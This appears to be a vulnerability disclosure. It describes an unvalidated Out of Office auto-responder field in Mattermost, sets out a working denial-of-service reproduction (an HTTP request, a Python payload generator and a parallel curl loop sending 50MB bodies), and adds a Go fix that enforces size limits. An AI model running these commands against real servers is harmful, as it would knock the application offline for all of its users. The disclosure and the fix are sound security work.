A user can enable and modify their automatic response message, which is sent automatically while the user has the “Out of Office” status. The response message is not subject to any size check or validation, which allows an attacker to set an almost unlimited number of characters as the response value.
In a production environment it is possible to set up to 50MB of data as the response message value (the limit imposed by the default nginx configuration), which causes the server to stop responding to user requests and ultimately crash, because it cannot update and handle such a large amount of data.
Steps to reproduce:

- Obtain the `MMAUTHTOKEN` authentication token.
- Generate the payload: `python2.7 -c "print 'A' * 50000000"`
- Send a `PUT` request to the `/api/v4/users/me/patch` API endpoint:

```http
PUT http://localhost:8065/api/v4/users/me/patch
Content-Type: application/json
X-CSRF-TOKEN: <csrf-token>
Cookie: MMAUTHTOKEN=<token>

{"notify_props":{"auto_responder_active":"true","auto_responder_message":"<payload>"}}
```
Steps 3-6 can be automated with the following two commands (the `&;` in the original loop is a bash syntax error; the background operator `&` already terminates the command):

```shell
$ python2.7 -c "print '{\"notify_props\":{\"auto_responder_active\":\"true\",\"auto_responder_message\":\"' + 'A' * 50000000 + '\"}}'" > payload
$ for ((i = 0; i < 5; i++)); do curl -X PUT "http://<domain>/api/v4/users/me/patch" -H 'Content-Type: application/json' -d @payload --cookie "MMAUTHTOKEN=<token>" -H "X-CSRF-TOKEN: <csrf-token>" & done
```
Any user can cause a full denial of service of the application server, making it unavailable to all its users.
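The fix this report calls for is a server-side size check on the field and on the request body, applied before anything is parsed or persisted. The following Go snippet is an added example of that check and is not Mattermost's own code; the `notify_props` / `auto_responder_message` JSON shape comes from the request above, while the `maxAutoResponderMessage` and `maxPatchBody` limits are assumed values, since the report names no product limit.

```go
package main

import (
	"encoding/json"
	"errors"
	"io"
)

// Assumed limits: the report gives no product value, only the 50MB nginx default it abused.
const (
	maxAutoResponderMessage = 1000      // characters allowed in auto_responder_message
	maxPatchBody            = 64 * 1024 // bytes accepted for one /users/me/patch body
)

var (
	ErrBodyTooLarge         = errors.New("request body exceeds limit")
	ErrAutoResponderTooLong = errors.New("auto_responder_message exceeds maximum length")
)

// userPatch mirrors the JSON shape of the request body shown in the report.
type userPatch struct {
	NotifyProps map[string]string `json:"notify_props"`
}

// ValidateNotifyProps enforces the per-field length check the report says is missing.
func ValidateNotifyProps(props map[string]string) error {
	if msg, ok := props["auto_responder_message"]; ok && len(msg) > maxAutoResponderMessage {
		return ErrAutoResponderTooLong
	}
	return nil
}

// DecodePatch reads at most maxPatchBody bytes, so an oversized body is rejected before it is
// parsed or persisted. In a handler, wrap r.Body with http.MaxBytesReader(w, r.Body, maxPatchBody).
func DecodePatch(r io.Reader) (*userPatch, error) {
	body, err := io.ReadAll(io.LimitReader(r, maxPatchBody+1))
	if err != nil {
		return nil, err
	}
	if len(body) > maxPatchBody {
		return nil, ErrBodyTooLarge
	}
	var p userPatch
	if err := json.Unmarshal(body, &p); err != nil {
		return nil, err
	}
	if err := ValidateNotifyProps(p.NotifyProps); err != nil {
		return nil, err
	}
	return &p, nil
}
```

A body cap at the application layer is what stops the server from buffering the full 50MB that nginx lets through; the field check keeps a merely large but under-cap message out of the database.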